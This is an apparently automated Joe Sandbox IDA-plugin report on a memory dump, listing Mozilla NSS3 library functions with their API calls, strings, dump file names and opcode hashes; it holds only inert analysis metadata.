Function 6CB4A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6CA17915,?,?), ref: 6CB4A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6CA17915,?,?), ref: 6CB4A8A6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB4A891
%s at line %d of [%.10s], xrefs: 6CB4A8A0
database corruption, xrefs: 6CB4A89B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 6338ab3247299dc5005c2aba00c5e65b644d2350955faa59bdfa4dc458c55b5a
Instruction ID: 4b0795e3801048c8d178d9be8a94a2dd7e0df7e67652a0419a87fa18a28ecf97
Opcode Fuzzy Hash: 6338ab3247299dc5005c2aba00c5e65b644d2350955faa59bdfa4dc458c55b5a
Instruction Fuzzy Hash: FD112975A04264ABDB048F51DC51AAEB7A5FF49324F008038FC594BB84EB34E956DB92

Function 6CA60DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CA60BDE), ref: 6CA60DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CA60BDE), ref: 6CA60DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CA60BDE), ref: 6CA60DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CA60BDE), ref: 6CA60E32

Strings

%s incr => %d (find lib), xrefs: 6CA60E2D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 056d5734ab9e2f54bf8946ccd804342167699a2c77b1ced6cef75167f94dd187
Instruction ID: 5bafdcc51300bf2aae0efc57ae926dc9feada4d8b5467958816b1768fb1601f4
Opcode Fuzzy Hash: 056d5734ab9e2f54bf8946ccd804342167699a2c77b1ced6cef75167f94dd187
Instruction Fuzzy Hash: A60147727012A09FE7208F25DC45E1B73BCDF45A08B0844ADE909D3B41E761FC9887E1

Function 6CA09C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CA09CF2
LeaveCriticalSection.KERNEL32(?), ref: 6CA09D45
EnterCriticalSection.KERNEL32(?), ref: 6CA09D8B
LeaveCriticalSection.KERNEL32(?), ref: 6CA09DDE

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a2100095693f593faa98f6a730d5633d0c990e1f7183cd2f0bc83cfa65f14c24
Instruction ID: cca6b668503a5310ab7932287eb8ce7b86f3727ae52cb58d71164004fe76c460
Opcode Fuzzy Hash: a2100095693f593faa98f6a730d5633d0c990e1f7183cd2f0bc83cfa65f14c24
Instruction Fuzzy Hash: 59A1A071B04140CFEB08AF74FAAA76E3779BB4A359F1C412DD40647A40DB39E985CB92

Function 6CA91E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6CA91ECC

Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390AB
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390C9
Part of subcall function 6CB39090: EnterCriticalSection.KERNEL32 ref: 6CB390E5
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB39116
Part of subcall function 6CB39090: LeaveCriticalSection.KERNEL32 ref: 6CB3913F

TlsGetValue.KERNEL32 ref: 6CA91EDF
EnterCriticalSection.KERNEL32(?), ref: 6CA91EEF
PR_ExitMonitor.NSS3(?), ref: 6CA91F37
PR_Unlock.NSS3(?), ref: 6CA91F44

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: b015a01c98c8a71383fd929d2f4b13c5b7e33e3da161c603a7218f0ba0f66d6c
Instruction ID: 19a044ac8c24848542d1b17db7560824f62433003a2ffc4cf6e1c9fd20667cad
Opcode Fuzzy Hash: b015a01c98c8a71383fd929d2f4b13c5b7e33e3da161c603a7218f0ba0f66d6c
Instruction Fuzzy Hash: C571C2759043059FD700CF24D941A6BB7F9FF88358F184929E95993B10E731F998CB92

Function 6CB1DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CB1DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CB1DE77

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: 7cc69fbcbf1ef6b4fda78d95a86791e62de85383aa790a78fc776fa970ff5292
Instruction ID: 07399190c67d512c74871d401989b7d5d1cebe395508e45e1837f13791004f3d
Opcode Fuzzy Hash: 7cc69fbcbf1ef6b4fda78d95a86791e62de85383aa790a78fc776fa970ff5292
Instruction Fuzzy Hash: 41715571A08314CBDF11CFAAD5C068AB7B4FF49718F25816DD9596BB06D730AA41CF81

Function 6CAE9E00 Relevance: 7.7, APIs: 5, Instructions: 157COMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3(?), ref: 6CAE9EB2
PR_Sleep.NSS3(00000000), ref: 6CAE9EBC
PR_EnterMonitor.NSS3(?), ref: 6CAE9ED8
TlsGetValue.KERNEL32 ref: 6CAE9F46
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CAE9F8B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Monitor$EnterErrorExitSleepValue
String ID:
API String ID: 2181969484-0
Opcode ID: 857961d9fbe366edfec1c8b080abecf50a0009955bdb303f2420c4697632da57
Instruction ID: 5f999b3be9de9fbcaf320aadfa90f0fbe9b3bd361e1ddab396e8bec70d3ae6c7
Opcode Fuzzy Hash: 857961d9fbe366edfec1c8b080abecf50a0009955bdb303f2420c4697632da57
Instruction Fuzzy Hash: AA513371A043158BEB109E79CA407EE77B6AF8870CF184178DD089BA82D732D8C5DBC1

Function 6CA9BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CA9BF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA9BF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA79F71,?,?,00000000), ref: 6CA9BF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6CA9BFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA9C014

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: d7a3aa824d4c16011e0c6dc9ab47f67470d92e9144b30f773c69798336400b03
Instruction ID: 19a91078904b3fc822674758fd8f6cde28ab92229573ba61f7ed7c3df594477c
Opcode Fuzzy Hash: d7a3aa824d4c16011e0c6dc9ab47f67470d92e9144b30f773c69798336400b03
Instruction Fuzzy Hash: 3841F975B112059BEB10CE65DD82BBE73F9AF44208F144228E91AD7B41FB31D989CBE1

Function 6CA6EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA6EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CA6EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CA6EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA6EEEB
free.MOZGLUE(?), ref: 6CA6EEF6

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: c5223458e80b2a9a9f4c159db29edab86a4cc13fe237ccaa4303a288bf1a5ab5
Instruction ID: 32f5ce9262fa9e8f0ef0500f490e7504648db16e53f6f1a65c8ea84f3c912400
Opcode Fuzzy Hash: c5223458e80b2a9a9f4c159db29edab86a4cc13fe237ccaa4303a288bf1a5ab5
Instruction Fuzzy Hash: 853126B1A00641BBEB209F2ECC44B667BF4FB46714F180529E95A87F50D731E994CBE2

Function 6CAB1EA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6CA96295,?,00000000,00000000,00000001,6CAB2653,?), ref: 6CAB1ECB

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

TlsGetValue.KERNEL32(?,00000001,?,?,6CA96295,?,00000000,00000000,00000001,6CAB2653,?), ref: 6CAB1EF1
EnterCriticalSection.KERNEL32(?), ref: 6CAB1F01
PR_SetError.NSS3(00000000,00000000), ref: 6CAB1F39

Part of subcall function 6CABFE20: TlsGetValue.KERNEL32(6CA95ADC,?,00000000,00000001,?,?,00000000,?,6CA8BA55,?,?), ref: 6CABFE4B
Part of subcall function 6CABFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CABFE5F

PR_Unlock.NSS3(?), ref: 6CAB1F67

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID:
API String ID: 704537481-0
Opcode ID: decae27a66d7fe3104ab0cf3c666e3ba5ddd50a540b7bc7971c0cf5887a9d1a6
Instruction ID: 3fb70c6af0dfcd802e3fe99d419aa5340dc8fbc288c3332b118fc9a0a8f22a69
Opcode Fuzzy Hash: decae27a66d7fe3104ab0cf3c666e3ba5ddd50a540b7bc7971c0cf5887a9d1a6
Instruction Fuzzy Hash: 4021E475A042049BEB00AF79DC45AAA377DEF45368F184125FE08A7B11E730E994C6E0

Function 6CA71DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA71E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA71E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA71E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CA71E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CA71EAD

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: 9f3f13a23c60044aee5143ac49fab91f39e6bb6ec0dbeeddba56ed2ba04b35eb
Instruction ID: 05691bbdc40236cdda611e9cfa2e684efe4b408caa95f73ff361f2803f937b00
Opcode Fuzzy Hash: 9f3f13a23c60044aee5143ac49fab91f39e6bb6ec0dbeeddba56ed2ba04b35eb
Instruction Fuzzy Hash: D321F776E042109BD7108E64DC51BBE73E8AB84328F184638EE5D57B80E730D98887E2

Function 6CAE68A0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6CAE68B4

Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390AB
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390C9
Part of subcall function 6CB39090: EnterCriticalSection.KERNEL32 ref: 6CB390E5
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB39116
Part of subcall function 6CB39090: LeaveCriticalSection.KERNEL32 ref: 6CB3913F

Part of subcall function 6CA60F00: PR_GetPageSize.NSS3(6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F1B
Part of subcall function 6CA60F00: PR_NewLogModule.NSS3(clock,6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F25

PR_MillisecondsToInterval.NSS3(?), ref: 6CAE68E6
PR_MillisecondsToInterval.NSS3(?), ref: 6CAE6938
PR_MillisecondsToInterval.NSS3(?), ref: 6CAE6986
PR_ExitMonitor.NSS3(?), ref: 6CAE69BA

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: IntervalMillisecondsValue$CriticalEnterMonitorSection$ExitLeaveModulePageSize
String ID:
API String ID: 1802314673-0
Opcode ID: 8e89a253efe75768b0508d45d4cb50b5a739eed28166a70f4d6c7b48e1ffcec2
Instruction ID: 49484844d6a5fd2b787a7fae9d555cac88dfb1472131efaccf6161cfd933e55e
Opcode Fuzzy Hash: 8e89a253efe75768b0508d45d4cb50b5a739eed28166a70f4d6c7b48e1ffcec2
Instruction Fuzzy Hash: BE31D635600955EBDB145BB4ED183DABB74BF4A30AF080229D92D92B51DB3478E8DEC3

Function 6CB81E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CB81E5C

Part of subcall function 6CB39BF0: TlsGetValue.KERNEL32(?,?,?,6CB80A75), ref: 6CB39C07

PR_Lock.NSS3(00000000), ref: 6CB81E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CB81EAB
PR_GetCurrentThread.NSS3 ref: 6CB81ED0
PR_Unlock.NSS3(?), ref: 6CB81EE8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: dac4ac198a1de7e7f8e98b97632136d2c18198ed84c377f8b23c1becc660ff33
Instruction ID: 2ead628e04e236a94e72c32e0c73ee86ccfedb368199a3aebb5b2b6786bae7ff
Opcode Fuzzy Hash: dac4ac198a1de7e7f8e98b97632136d2c18198ed84c377f8b23c1becc660ff33
Instruction Fuzzy Hash: A021A174A175A2DBD710CF19D840A46B7B1FF44719B298225D8299BF40D730F850CBE2

Function 6CACBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CA7E708,00000000,00000000,00000004,00000000), ref: 6CACBE6A

Part of subcall function 6CAD0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD08B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CA804DC,?), ref: 6CACBE7E

Part of subcall function 6CACFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAC8D2D,?,00000000,?), ref: 6CACFB85
Part of subcall function 6CACFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CACFBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CACBEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CA804DC,?,?), ref: 6CACBED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CACBEEB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: a525cbcfc5e985cfb3f89f1ad4e2d7166a42d5cbcee05a28c73539749b98ff92
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: 3411047670425567E700996ABD80F5B736D9B40B58F084225FE0497B52E732DC8887E3

Function 6CA7AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CA73FFF,00000000,?,?,?,?,?,6CA71A1C,00000000,00000000), ref: 6CA7ADA7

Part of subcall function 6CAD14C0: TlsGetValue.KERNEL32 ref: 6CAD14E0
Part of subcall function 6CAD14C0: EnterCriticalSection.KERNEL32 ref: 6CAD14F5
Part of subcall function 6CAD14C0: PR_Unlock.NSS3 ref: 6CAD150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CA73FFF,00000000,?,?,?,?,?,6CA71A1C,00000000,00000000), ref: 6CA7ADB4

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CA73FFF,?,?,?,?,6CA73FFF,00000000,?,?,?,?,?,6CA71A1C,00000000), ref: 6CA7ADD5

Part of subcall function 6CACFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAC8D2D,?,00000000,?), ref: 6CACFB85
Part of subcall function 6CACFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CACFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CB994B0,?,?,?,?,?,?,?,?,6CA73FFF,00000000,?), ref: 6CA7ADEC

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA73FFF), ref: 6CA7AE3C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
